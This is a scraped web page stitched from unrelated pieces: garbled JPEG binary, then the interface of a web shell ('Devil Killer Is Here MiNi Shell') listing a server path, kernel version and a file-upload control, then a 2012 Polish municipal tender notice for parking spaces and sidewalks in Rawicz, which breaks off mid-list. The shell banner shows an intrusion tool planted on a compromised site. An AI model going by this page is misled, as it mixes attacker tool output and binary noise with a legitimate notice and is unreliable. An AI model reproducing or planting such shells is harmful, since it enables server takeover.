JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120406/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120406/80313-N-2012.html

<p class="kh_header"><b>Rawicz: Zaprojektowanie i wykonanie miejsc postojowych dla samochodów osobowych przy ul. Mikołajewicza w Rawiczu oraz budowa chodnika we wsiach Łaszczyn i Słupia Kapitulna</b><br>
<b>Numer ogłoszenia: 80313 - 2012; data zamieszczenia: 06.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy Rawicz działający w imieniu Gminy Rawicz , ul. Piłsudskiego 21, 63-900 Rawicz, woj. wielkopolskie, tel. 065 5465400, faks 065 5464167.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rawicz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaprojektowanie i wykonanie miejsc postojowych dla samochodów osobowych przy ul. Mikołajewicza w Rawiczu oraz budowa chodnika we wsiach Łaszczyn i Słupia Kapitulna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest opracowanie dokumentacji projektowej do zgłoszenia budowy miejsc postojowych dla samochodów osobowych  przy ul. Mikołajewicza w Rawiczu i budowy chodnika we wsiach Łaszczyn i Słupia Kapitulna wraz z wykonaniem robót budowlanych związanych  z  realizacją tych zadań  zgodnie  z założeniami,  wytycznymi  i wymaganiami zawartymi w programie funkcjonalno - użytkowym dla tych zadań.              

Zamówienie obejmuje: 

ZAKRES 1. Budowa miejsc postojowych dla samochodów osobowych przy ul. Mikołajewicza  w Rawiczu,    
ZAKRES 2. Budowa  chodnika we wsi Łaszczyn,  
ZAKRES 3. Budowa  chodnika we wsi Słupia Kapitulna.      

Mogące występować w programie funkcjonalno - użytkowym nazwy własne producentów lub wyrobów zostały użyte wyłącznie w celu wskazania założonego standardu przyjętych rozwiązań. 


2.	Na Wykonawcy ciąży obowiązek wykonania następujących prac: 

1)	zakup i aktualizacja podkładów mapowych do celów projektowych, 
2)	uzyskanie w imieniu i na rzecz Zamawiającego wszelkich wymaganych prawem uzgodnień i decyzji  
związanych z opracowaniem projektu budowlanego w zakresie potrzebnym dla realizacji inwestycji,  
3)	opracowanie projektu budowlanego wraz z informacją BIOZ, 
4)	sporządzenie specyfikacji technicznej wykonania i odbioru robót budowlanych w zakresie niezbędnym do realizacji niniejszego zamówienia, 
5)	zgłoszenie właściwemu organowi rozpoczęcie robót związanych z budową chodnika oraz miejsc postojowych,  
6)	opracowanie i zatwierdzenie projektu zmiany organizacji ruchu na czas  prowadzenia robót.
7)	wykonanie robót budowlanych związanych z budową chodników i miejsc postojowych,  


3.	Wykonawca na podstawie udzielonego pełnomocnictwa do działania w imieniu Gminy Rawicz zobowiązany jest w imieniu Zamawiającego i na jego rzecz uzyskać wymagane zezwolenia, decyzje, opinie, uzgodnienia niezbędne do opracowania  projektów.  Koszty z tym związane ponosi Wykonawca  w ramach  zaproponowanej ceny ofertowej. 

4.	Wykonawca jest zobowiązany do opracowania dokumentacji projektowej w oparciu o obowiązujące przepisy prawne, w szczególności o wymogi wynikające z Prawa budowlanego oraz przepisy wykonawcze  jak również uwzględnić warunki i wymagania określone w wydanych opiniach i uzgodnieniach. Zakres i treść projektów budowlanych powinna być dostosowana do specyfiki i charakteru obiektu oraz stopnia skomplikowania robót budowlanych. 
Wykonawca w trakcie prac projektowych jest zobowiązany informować Zamawiającego  o stopniu zaawansowania prac oraz o proponowanych rozwiązaniach projektowych.  Zamawiający zastrzega sobie prawo do oceny, korekty i akceptacji proponowanych rozwiązań  w trakcie prowadzonych prac projektowych. 
Ponadto w ramach ceny ofertowej każdy Wykonawca będzie zobowiązany do:
1)	przyjazdu do siedziby Zamawiającego celem zaprezentowania postępu prac projektowych ,
2)	konsultowania (na roboczo) z Zamawiającym zaproponowanych rozwiązań, 
3)	poniesienia kosztów badań podłoża gruntowego ,

Dokumentacja projektowa  oprócz wersji papierowej musi  być przekazana  w wersji elektronicznej  w formacie dwg ( nie nowszy niż 2006) lub dxf oraz w pdf. 
	  
5.	Wykonawca po opracowaniu projektu i zgłoszeniu budowy chodnika - budowy miejsc postojowych (przed rozpoczęciem robót) będzie zobowiązany do zdania Zamawiającemu niżej wymienione dokumenty (osobno dla każdego zakresu): 
1)	po 2 egzemplarze projektu budowlanego wraz z wszystkimi  w tym zakresie uzgodnieniami  oraz BIOZ +  1 egz.  w wersji 
elektronicznej w formacie  dwg (nie nowszy  niż Auto Cad 206) lub dxf oraz w pdf ;    
2)	po 2 egzemplarze  specyfikacji technicznej  wykonania i odbioru robót budowlanych  + wersja elektroniczna w word,    
3)	po 2 egzemplarze dokumentacji zmiany organizacji ruchu  + wersja elektroniczna,
4)	oświadczenie, że opracowana dokumentacja jest zgodna z obowiązującymi przepisami oraz zasadami 
	wiedzy technicznej,  
5)	oświadczenia o przeniesieniu na Zamawiającego wszelkich uprawnień z tytułu praw autorskich i pokrewnych, 
6)	zgłoszenie właściwemu organowi budowlanemu o zamiarze budowy (rozpoczęcia robót budowlanych). Fakt złożenia wniosku  winien być potwierdzony przez organ budowlany - Starostwo Powiatowe w Rawiczu,  
7)	podkłady mapowe wykorzystane do prac projektowych - do zdania Zamawiającemu.  

Wymienione wyżej ilości dokumentacji nie obejmują tych egzemplarzy, które należy złożyć we właściwym organie architektoniczno-budowlanym lub będą wykorzystane do celów uzgodnień., jak również nie obejmują kompletu dokumentacji projektowej, którą Wykonawca jest zobowiązany sobie dodatkowo zabezpieczyć na czas prowadzenia robot.   
Przy wycenie przedmiotu zamówienia należy uwzględnić ilości egzemplarzy przeznaczone dla Zamawiającego jak również te, które należy złożyć w innych organach. 

6.	Przy wykonawstwie oraz odbiorze robót objętych zamówieniem obowiązywać  będą zasady i wymagania dotyczące zasad 
        prowadzenia robót jak również ogólne wymagania dotyczące wykonania i odbioru robót budowlanych określone:
1)	projekcie budowlanym opracowanym w oparciu o założenia zawarte programie funkcjonalno-użytkowym , 
2)	kosztorysie ofertowym,
3)	w opracowanej  przez Wykonawcę, zgodnie z obowiązującymi w tym zakresie przepisami, Specyfikacji 
        Technicznej Wykonania i Odbioru Robót Budowlanych,
4)	specyfikacji istotnych warunków zamówienia, 
5)	Polskich Normach 

7.	Wykonawca przy realizacji robót budowlanych i prac projektowych zobowiązany będzie również do:

1)	stosowania wyrobów budowlanych wprowadzonych do obrotu na zasadach określonych w ustawie z dnia 16.04. 2004 roku o wyrobach budowlanych (Dz. U. Nr 92 poz. 881 z późniejszymi  zm.);

2)	wykonania przedmiotu umowy zgodnie z  przepisami prawa budowlanego przy pomocy osób posiadających odpowiednie kwalifikacje i uprawnienia oraz wyposażonych w odpowiedni sprzęt i narzędzia; 

3)	właściwego zabezpieczenie i oznakowanie terenu budowy oraz  placu budowy, 

4)	ubezpieczenie budowy i robót z tytułu szkód, które mogą zaistnieć w związku z  określonymi zdarzeniami  losowymi oraz od odpowiedzialności cywilnej,  ponoszenia kosztów szkód wynikłych w czasie wykonywania robót jak również za odpowiedzialność za wszelkie zdarzenia powstałe z tej przyczyny;

5)	organizacji i zagospodarowania placu budowy oraz zaplecza budowy, ustanowienie  kierownika budowy oraz w razie potrzeby wykonanie planu bezpieczeństwa i ochrony zdrowia, zgodnie  z Rozporządzeniem Ministra Infrastruktury  
z dnia 23.06. 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U.  Nr 120 poz. 1126)  

6)	zmiany organizacji ruchu na odcinku wykonywanych prac ( wykonanie i zatwierdzenie projektu organizacji  ruchu na czas wykonywanych robót oraz oznakowanie robót wg projektu ), 

7)	obsługa geodezyjna podczas realizacji inwestycji oraz sporządzenie inwentaryzacji geodezyjnej powykonawczej ( do zdania Zamawiającemu) jak również  zgłoszenie jej w ośrodku geodezyjnym,

8)	zorganizowanie i przeprowadzenie niezbędnych prób, pomiarów, badań ( w tym badanie zagęszczenia gruntu) i odbiorów oraz wykonanie dokumentacji powykonawczej ,

9)	po zakończeniu robót doprowadzenie terenu budowy do stanu pierwotnego, demontaż obiektów tymczasowych  oraz  uporządkowanie całego terenu zajętego na prowadzenie robót  

10)	udzielenia 3 letniej rękojmi i gwarancji na wykonane roboty i wbudowane materiały .

UWAGA: 

Dokładny zakres prac projektowych i wykonawstwa oraz dodatkowe wymagania Inwestora określono w  Programie funkcjonalno - użytkowym  stanowiącym załącznik do niniejszej SIWZ. 
Program ten służy Wykonawcy jako wytyczne i stanowi podstawę do przygotowania oferty na opracowanie projektu i realizację robót oraz zawiera dane potrzebne do ustalenia kosztów prac projektowych i robót budowlanych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>ZAMAWIAJĄCY  przewiduje udzielenie zamówień uzupełniających na podstawie art. 67 ust.1 pkt  6  ustawy, stanowiących  nie więcej niż  50% wartości zamówienia podstawowego (dla każdego zakresu)  i polegających na powtórzeniu tego samego rodzaju zamówień,  w okresie 3 lat od udzielenia zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1, 45.23.32.50-6, 71.32.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W prowadzonym postępowaniu Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 2 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Wypełniona i podpisana przez Wykonawcę oferta przetargowa (załącznik nr 1 do SIWZ).

2)	KOSZTORYS OFERTOWY (kalkulacja cenowa - załącznik nr 6 do SIWZ )  w wersji papierowej opracowany przez WYKONAWCĘ  w oparciu o załączony program funkcjonalno - użytkowy oraz zapisy zawarte w niniejszej specyfikacji. 

3)	Oryginał pełnomocnictwa do reprezentowania ( o ile ofertę składa pełnomocnik)  lub kopia pełnomocnictwa poświadczona przez notariusza</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza - jeżeli uzna za uzasadnione - możliwość zmiany ustaleń zawartej umowy w stosunku do treści oferty Wykonawcy o których mowa w art. 144 ustawy PZP w następujących przypadkach :

1)	potrzeby wykonania robót zamiennych lub odstąpienia od realizacji części robót, i związanej z tym zmiany wynagrodzenia na wniosek Zamawiającego lub Wykonawcy,
2)	wystąpienia robót dodatkowych, których wykonanie uzależnia wykonanie zamówienia podstawowego,      
3)	braku rozwiązań  projektowych lub błędów w dokumentacji projektowej stwierdzonych  w czasie trwania robót o czas niezbędny do ich uzupełnienia,  
4)	zmiany urzędowej wysokości stawki podatku VAT, 
5)	wystąpienia zdarzeń wymuszających przerwę w realizacji zamówienia niezależnych od Wykonawcy,  
6)	wprowadzenie lub zmiana zgłoszonych w ofercie części robót wykonywanych przy udziale Podwykonawcy, za uprzednią zgodą Zamawiającego, 
7)	zmiany  terminu realizacji zamówienia, 
8)	przekształcenie którejkolwiek ze stron umowy,
9)	zmiany personelu Wykonawcy i Zamawiającego, za uprzednią zgodą Zamawiającego (np. osoby odpowiedzialne za  realizację zamówienia itp.)
10)	warunków płatności z zastrzeżeniem, że zmiana ta będzie korzystna i niezbędna dla Zamawiającego,
11)	innych niezbędnych zmian pod warunkiem, że są korzystne dla Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rawicz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego - w Urzędzie Miejskim Gminy Rawicz, ul. Piłsudskiego 21, 63-900 Rawicz, pokój 111 - po wpłaceniu należności w kasie Urzędu lub za zaliczeniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2012 godzina 10:00, miejsce: w siedzibie Zamawiającego - sekretariacie Urzędu Miejskiego Gminy Rawicz, 63-900 Rawicz, ul. Piłsudskiego 21 pokój 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie nie jest finansowane ze środków Unii Europejskiej. 2. Wszelkie oświadczenia, wnioski, zawiadomienia, wezwania oraz inne informacje i dokumenty w postępowaniu o udzielenie zamówienia ZAMAWIAJĄCY i WYKONAWCY przekazują pisemnie. 3. ZAMAWIAJĄCY dopuszcza również możliwość porozumiewania się OBU STRON (Wykonawca, Zamawiający) za pomocą: faksu (65) 546-41-67 oraz poczty elektronicznej przetargi@rawicz.pl 4. Jeżeli ZAMAWIAJĄCY lub WYKONAWCA przekaże faksem lub pocztą elektroniczną dokumenty lub informacje, o których mowa wyżej, każda ze stron na żądanie drugiej niezwłocznie potwierdzi fakt ich otrzymania. 5. Zamawiający nie przewiduje zawarcia umowy ramowej. 6. Zamawiający nie zamierza ustanowić dynamicznego systemu zakupów. 7. Zamawiający nie przewiduje określania w opisie przedmiotu zamówienia wymagań związanych z realizacją zamówienia o których mowa w art. 29 ust. 4.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakres 1. Budowa miejsc postojowych dla samochodów osobowych przy ul. Mikołajewicza w Rawiczu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZAKRES 1. Budowa miejsc postojowych dla samochodów osobowych przy ul. Mikołajewicza  w Rawiczu obejmuje w szczególności:

a)     opracowanie dokumentacji projektowej wraz ze zgłoszeniem robót we właściwym organie budowlanym;
b)     roboty rozbiórkowe wraz z transportem materiału rozbiórkowego; 
c)     regulacja wysokościowa; 
c)     nawierzchnia  miejsc postojowych -  260,00m2;  
d)     ułożenie krawężnika prostego  55,00 m oraz krawężnika łukowego 16,00 m; 
e)     odwodnienie poprzez spadki poprzeczne i podłużne oraz wykonanie 2 szt. kratek ściekowych oraz włączenie do 
        istniejącej kanalizacji deszczowej za pomocą przykanalików  o długości 15m;
f)	obsługa geodezyjna, organizacja ruchu oraz badania zagęszczenia gruntu.     
g)	Inne prace towarzyszące wykonaniu zamówienia.

Wymagania Zamawiającego w stosunku  do przedmiotu zamówienia, warunki techniczne,  dane dotyczące konstrukcji nawierzchni  jak również  sposób odwodnienia określają zapisy niniejszego rozdziału oraz zostały  określone w programie funkcjonalno - użytkowym stanowiącym załącznik nr 7 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.50-6, 71.32.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakres 2 - Budowa chodnika we wsi Łaszczyn.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZAKRES 2. Budowa  chodnika we wsi Łaszczyn  obejmuje w szczególności :

a)   opracowanie dokumentacji projektowej wraz ze zgłoszeniem robót we właściwym organie budowlanym;
b)   roboty rozbiórkowe wraz z transportem materiału rozbiórkowego; 
c)   budowa nawierzchni chodnika o powierzchni  -  305,00m2, oraz  nawierzchni zjazdów  o powierzchni 55,00 m2 ;  
d)   ułożenie krawężnika prostego  - 250 mb, krawężnika łukowego -  12 mb, obrzeża betonowego - 150,00 mb;  
e)   obsługa geodezyjna, organizacja ruchu; 
f)    inne prace towarzyszące wykonaniu zamówienia.


Wymagania Zamawiającego w stosunku  do przedmiotu zamówienia, warunki techniczne, dane dotyczące konstrukcji nawierzchni  określają zapisy niniejszego rozdziału oraz zostały  określone w programie funkcjonalno - użytkowym stanowiącym załącznik nr  7  do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1, 71.32.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakres 3 - Budowa chodnika we wsi Słupia Kapitulna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZAKRES 3. Budowa  chodnika we wsi Słupia Kapitulna obejmuje w szczególności : 

a)  opracowanie dokumentacji projektowej wraz ze zgłoszeniem robót we właściwym organie budowlanym;
b)  roboty rozbiórkowe wraz z transportem materiału rozbiórkowego; 
